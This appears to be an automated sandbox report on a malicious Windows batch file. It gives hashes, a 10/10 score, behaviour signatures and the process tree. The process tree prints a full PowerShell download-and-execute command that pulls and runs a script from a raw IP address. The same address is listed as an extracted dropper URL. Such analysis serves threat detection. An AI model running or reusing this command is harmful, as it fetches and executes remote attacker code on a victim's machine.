Analysis
-
max time kernel
12s -
max time network
50s -
platform
windows7_x64 -
resource
win7 -
submitted
31-08-2020 11:10
Static task
static1
Behavioral task
behavioral1
Sample
14a4a3784dbc627e1c40e41285df29c2.bat
Resource
win7
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
14a4a3784dbc627e1c40e41285df29c2.bat
Resource
win10v200722
windows10_x64
0 signatures
0 seconds
General
-
Target
14a4a3784dbc627e1c40e41285df29c2.bat
-
Size
214B
-
MD5
382d73e9001eda598dfc10e833b7742b
-
SHA1
c732b41c5dc34d1b378fb23cc634cc6ee82774fa
-
SHA256
4acb6253945b477cb489a9b8adbe3e5dff9f142c7ec942a0a6d4902ccea3ffd7
-
SHA512
b046949436d9c1f153298971c3140b76f5802be988a2b95dca2f2df6102dfdff7d92f3da0fe6c813a65f2af6abd0a8a2227177f3787252d738e82b2231a121eb
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://185.103.242.78/pastes/14a4a3784dbc627e1c40e41285df29c2
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 5 816 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 816 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 816 powershell.exe 816 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 816 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.exedescription pid process target process PID 1156 wrote to memory of 816 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 816 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 816 1156 cmd.exe powershell.exe PID 1156 wrote to memory of 816 1156 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\14a4a3784dbc627e1c40e41285df29c2.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1156 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/14a4a3784dbc627e1c40e41285df29c2');Invoke-ZZXMUDC;Start-Sleep -s 10000"2⤵
- Blacklisted process makes network request
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:816